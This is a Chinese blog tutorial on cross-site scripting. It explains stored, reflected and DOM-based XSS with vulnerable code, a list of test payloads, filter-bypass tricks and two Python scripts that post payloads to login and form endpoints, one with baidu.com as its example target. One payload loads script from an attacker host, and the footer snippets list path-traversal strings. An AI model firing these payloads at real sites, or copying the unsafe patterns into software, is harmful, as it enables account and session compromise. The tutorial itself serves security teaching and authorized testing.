XSS跨站脚本攻击

原创 已于 2025-03-25 17:30:02 修改 · 1.3k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端

于 2025-02-12 16:18:50 首次发布

一、XSS简介

XSS(Cross-Site Scripting)即常见的WEB安全漏洞,通过恶意脚本注入到网页中进行攻击,当用户访问该网站时,实际跳转的是恶意网页。

二、常见XSS类型

1、存储型XSS

1)特点

恶意脚本被永久存储在目标服务器上(如数据库),当用户访问包含该脚本的页面时,脚本被执行。

2)常见漏洞与攻击手法

漏洞代码:

        <!-- 假设服务器未对用户输入进行过滤 -->
        <div>
            <%= userInput %>
        </div>

攻击:<script>alert('XSS');</script>

2、反射型XSS

1)特点

恶意脚本作为请求的一部分发送到服务器,服务器将其反射回用户的浏览器并执行。例如:攻击者通过邮件或社交工程诱导用户点击一个包含恶意脚本的链接,脚本在用户浏览器中执行。

2)常见漏洞与攻击手法

漏洞代码:

        <!-- 假设URL参数未经过滤直接输出 -->
        <div>
            <%= request.getParameter("input") %>
        </div>

攻击: http://example.com/page#<script>alert('XSS')</script>

3、DOM型XSS

1)特点

通过操纵页面DOM(文档对象模型)结构注入恶意脚本,DOM型XSS是在客户端浏览器页面进行,不会涉及服务器端响应,传统防火墙难以检测。

2)原理与危害

客户端JavaScript代码直接使用了用户可控输入(即输入未经验证或转义的URL参数、表单数据、 cookie等)攻击者通过构造恶意输入注入脚本,在受害者浏览器中执行达到篡改用户cookie或token、引导用户到恶意网站、篡改页面内容进行钓鱼、传播恶意软件的目的。

3)常见漏洞与攻击手法

  • 漏洞代码1:直接使用 innerHTML 插入用户输入(使用 textContent 代替 innerHTML

        // 从 URL 参数获取用户输入
        const userInput = new URLSearchParams(window.location.search).get('content');
        document.getElementById('output').innerHTML = userInput; // 危险操作!

  • 攻击:访问以下 URL 触发弹窗

        http://example.com/page?content=<img src="x" οnerrοr="alert('XSS')>

  • 漏洞代码2:通过 eval() 或 setTimeout 执行用户输入的字符串。(避免使用)

        const userInput = document.getElementById('inputField').value;
        eval(userInput); // 直接执行用户输入的字符串

  • 攻击:文本框输入 alert('XSS')立即执行脚本

  alert('XSS')

  • 漏洞3:动态修改 <script> 标签的 src 或内容(将特殊字符(如 <>&"')转换为实体)
  • 漏洞代码4:操作 location.hashlocation.search 等 URL 参数

        const hashContent = window.location.hash.substring(1);
        document.write(hashContent); // 将 hash 内容写入页面

  • 攻击:访问以下 URL 触发弹窗

        http://example.com/page#<script>alert('XSS')</script>

4)漏洞测试方法

  • 手动测试

        找出所有接受用户输入的入口(URL 参数、表单)插入测试脚本点击提交,查看是否会触发弹窗或执行脚本

示例脚本:

        <script>标签

                <script>alert(/1/)</script>
                <script>prompt(1)</script> 
                <script>confirm(1)</script>
                <script src="http://attacker.org/malicious.js"></script>
                <script src=data:text/javascript,alert(1)></script>
                <script>setTimeout(alert(1),0)</script>

        <img>标签

                <img src=x οnerrοr=alert(1)>
                <img src=x οnerrοr=prompt(1);>
                <img src=javascript:alert('1')>

        <a>标签

               <a href=”javascript:alert(1)”>点击触发</a>
               <a href="http://www.hacker.com">点击触发</a>
        <Iframe>标签

                <iframe src="javascript:alert(1)">
                <iframe οnlοad=alert(1)>

  • 工具辅助测试

         OWASP ZAP:自动化扫描 DOM 型 XSS

        浏览器开发者工具:审查 DOM 结构,跟踪数据流

  • 绕过基础过滤的 Payload

        大小写混淆:

                <ScRiPt>alert(1)</ScRiPt>

        HTML实题编码:

                &lt;script&gt;alert(1)&lt;/script&gt;  
                <!-- 实际可能被浏览器解析为 <script>alert(1)</script> -->

        JavaScript编码:

                <img src="x" οnerrοr="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;1&#x29;">
                <!-- 等价于 alert(1) -->

        拆分字符串:

                <svg οnlοad="alert`1`"></svg>  
                <img src="x" οnerrοr="a='aler';b='t(1)';window[a+b]();">

三、XSS 测试基本流程

1、收集信息

  • 确定目标应用的输入点(如表单、URL 参数、HTTP 头、Cookie 等)。
  • 了解应用如何处理用户输入(是否过滤、转义或编码)。

2、测试输入点

  • 在输入点尝试注入简单的 XSS 测试 payload,观察响应。
  • 测试存储型、反射型和 DOM 型 XSS。

3、验证漏洞

  • 确认注入的脚本是否被执行。
  • 检查是否有过滤或防护机制。

4、报告与修复

  • 记录漏洞细节(输入点、payload、影响)。
  • 提供修复建议(如输入验证、输出编码)。

四、XSS脚本注入示例

1、示例一

需求:特定登录页面中用户输入账户信息点击登录后弹出XSS弹窗的问题

import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup

# 目标网站配置(需授权)
# 示例网站
TARGET_URL = "http://www.baidu.com"
XSS_PAYLOADS = [
    '<ScriPt>alert("XSS Test - Authorized");</ScriPt>',
    '<svg/οnlοad=alert(1)>',
    '<img src=x onerror="alert(1)">',
    '" onload="alert(1)"',
    "'+alert(1)+'",
]

def test_xss_vulnerability():
    # 创建会话保持Cookies
    session = requests.Session()

    try:
        # 1. 获取登录页面的CSRF令牌(如有)
        login_page = session.post(TARGET_URL)
        login_page.raise_for_status()

        # 假设页面包含CSRF令牌(需根据实际情况解析)
        soup = BeautifulSoup(login_page.text, 'html.parser')
        csrf_input = soup.find('input', {'name': 'csrf_token'})
        csrf_token = csrf_input['value'] if csrf_input else None

        for payload in XSS_PAYLOADS:
            print(f"[*] 测试 Payload: {payload}")

            # 2. 构造恶意登录请求
            data = {
                'mobile': payload,  # 在账号字段注入XSS
                'code': 'payload',  # 在验证码字段注入XSS
                'csrf_token': csrf_token  # 若有CSRF保护
            }

            # 3. 提交登录请求
            response = session.post(
                TARGET_URL,
                data=data,
                headers={'Referer': TARGET_URL},
                allow_redirects=False  # 禁止自动重定向以检查响应内容
            )
            response.raise_for_status()

            # 4. 检查响应是否包含未编码的XSS载荷
            if payload in response.text:
                print("[+] XSS漏洞存在!未过滤的用户输入:")
                print(f"   测试载荷已注入:{payload}")
                print(f"   手动访问登录后页面,查看是否触发弹窗。")
                return

        print("[-] 未检测到XSS漏洞:所有测试 Payload 都被过滤或编码。")

    except requests.exceptions.HTTPError as e:
        print(f"[-] HTTP 错误:{str(e)}")
    except Exception as e:
        print(f"[-] 测试失败:{str(e)}")


if __name__ == "__main__":
    print("[*] 正在授权测试XSS漏洞(合法环境)...")
    test_xss_vulnerability()

2、实例二

需求:登录后,对新增编辑查询页面中有输入框的位置进行XSS注入验证测试

1)代码都一样,只是参数和请求的域名需要修改

import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup

# 目标网站配置(需授权)
# 需要修改的地方1
LOGIN_URL = "http://123.com" # 登录的url,因为需要获取权限
TARGET_URL = "http://123.com/add" # 需注入的url

# 注入的PAYLOADS
XSS_PAYLOADS = [
    '<ScriPt>alert("XSS Test - Authorized");</ScriPt>',
    '<svg/οnlοad=alert(1)>',
    '<img src=x onerror="alert(1)">',
    '" onload="alert(1)"',
    "'+alert(1)+'",
]

# OAuth2配置
# 需要修改的地方2
mobile = "12345678987"

def get_oauth_token():
    """获取OAuth2访问令牌"""

# 需要修改的地方3,不是post时data修改为params
    data = {
        "mobile": mobile
    }
    headers = {
        "Content-Type": "application/json"
    }
    try:
        response = requests.post(LOGIN_URL, json=data, headers=headers)
        response.raise_for_status()
        return response.json().get("data", {}).get("token")
    except requests.exceptions.HTTPError as e:
        print(f"[-] HTTP 错误:{str(e)}")
        print(f"[-] 响应内容: {response.text}")
        print(f"[-] 请求头: {headers}")
        print(f"[-] 请求体: {data}")
        print(f"[-] 请求体编码: {response.request.body}")
    except Exception as e:
        print(f"[-] 测试失败:{str(e)}")

def test_xss_vulnerability():
    # 创建会话保持Cookies
    session = requests.Session()

    try:
        # 获取OAuth2访问令牌
        access_token = get_oauth_token()
        if not access_token:
            print("[-] 无法获取访问令牌,终止测试。")
            return
        print(f"[*] 获取到的访问令牌: {access_token}")

        # 构造目标URL的请求头
        headers = {
            "Authorization": f"Bearer {access_token}",
            "Referer": TARGET_URL,
            "Content-Type": "application/json"
        }

        for payload in XSS_PAYLOADS:
            print(f"[*] 测试 Payload: {payload}")

            # 构造目标URL的请求参数,并在其中注入XSS载荷
            # 需要修改的地方4
            data = {
                        "dimensionId": "",
                        "dimensionName": payload # 在此字段注入XSS载荷

            }

            # 提交请求
            response = session.post(
                TARGET_URL,

                # 需要修改的地方5,不是post请求时这里修改为params=params
                json=data,
                headers=headers,
                allow_redirects=False  # 禁止自动重定向以检查响应内容
            )
            response.raise_for_status()

            # 打印响应内容以便调试
            print(f"[*] 响应状态码: {response.status_code}")
            print(f"[*] 响应内容: {response.text}")

            # 检查响应是否包含未编码的XSS载荷
            if payload in response.text:
                print("[+] XSS漏洞存在!未过滤的用户输入:")
                print(f"   测试载荷已注入:{payload}")
                print(f"   手动访问登录后页面,查看是否触发弹窗。")
                return

        print("[-] 未检测到XSS漏洞:所有测试 Payload 都被过滤或编码。")

    except requests.exceptions.HTTPError as e:
        print(f"[-] HTTP 错误:{str(e)}")
    except Exception as e:
        print(f"[-] 测试失败:{str(e)}")


if __name__ == "__main__":
    print("[*] 正在授权测试XSS漏洞(合法环境)...")
    test_xss_vulnerability()
FYHUSJS
关注
python制作游戏,简单的攻击代码
m0_55234643的博客
05-20 3475
这个简单的游戏制作代码,只是用另外的思维方式展示出来打游戏的时候任务的生命值还有一些东西,你可以将它和自己制作的游戏相互结合从而制作出来完整的游戏 import hashlib import string import time def makenum(name_str): str1 = name_str.encode(encoding="utf-8") h1 = hashlib.md5() h1.update(str1) g2=h1.hexdigest() g3=g2[0:2] g4
跨站脚本漏洞
weixin_46729085的博客
09-08 4166
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
XSS跨站脚本攻击)详解【场景、影响、检测、防护】
最新发布
NeoLshu的博客
09-28 1763
本文全面解析了XSS跨站脚本攻击)的原理、分类、示例及防护策略。XSS攻击通过注入恶意脚本,利用浏览器信任执行窃取凭证、篡改页面等操作。分为反射型、存储型和DOM型三种类型,攻击后果严重,可导致会话劫持、数据泄露等风险。文章提供了易受攻击代码示例及修复方案,强调根据不同输出上下文进行编码(如HTML、JavaScript转义),并推荐使用白名单过滤和安全的DOM操作API(如textContent)。检测方法包括手工测试、黑盒扫描和代码审计。防护核心在于输入验证、输出编码和严格的内容安全策略(CSP)。
常见的XSS攻击代码
weixin_30621711的博客
11-09 769
第一类: <tag on*=*/> 在html标签中触发事件 Example: 1.加载完毕自动触发事件 <body onload="alert('xss')"></body> 2.使html某元素撑满整个页面 <p onclick="alert('1')" style="postion:fixed;width:100%;hei...
XSS(跨站脚本攻击) - 常用代码大全
qq_28004653的博客
07-06 2165
1’"()&% <svg/οnlοad=alert(1)> '> =’> %3Cscript%3Ealert(‘XSS’)%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/wi
跨站脚本攻击—shellcode
wing 的专栏
01-13 1219
接下来讲述XSS  Shellcode 的调用。  何谓 Shellcode?这个名词曾经多次出现,包括平时经常能听到的 Expliot、 POC等,如果对这些概念还不够清晰,那么下面的解释你必要看一看。  【Shellcode】  所谓的 Shellcode,最初是溢出程序和蠕虫病毒的核心,实际上是指利用一个漏洞时所执行 的代码。在XSS跨站脚本中,是指由JavaS
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
精选资源
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS攻击及防御代码的简单演示
04-25
这个是XSS攻击及防御代码的简单演示,利用Node搭建的
XSS攻击 代码演示
05-13
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS攻击常识及常见的XSS攻击脚本汇总
求天下者,积少成多
06-01 1913
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里中罗列一
XSS--安全常用攻击脚本总结
weixin_49974303的博客
01-17 730
XSS常用脚本总结
跨站脚本攻击
晴天的博客
03-14 358
定义 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。 简介 用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会用十六进制(或其他编码方式)将链接编码,以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意
XSS 攻击常用代码
高压锅博客
12-22 7889
代码XSS 攻击常用代码
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值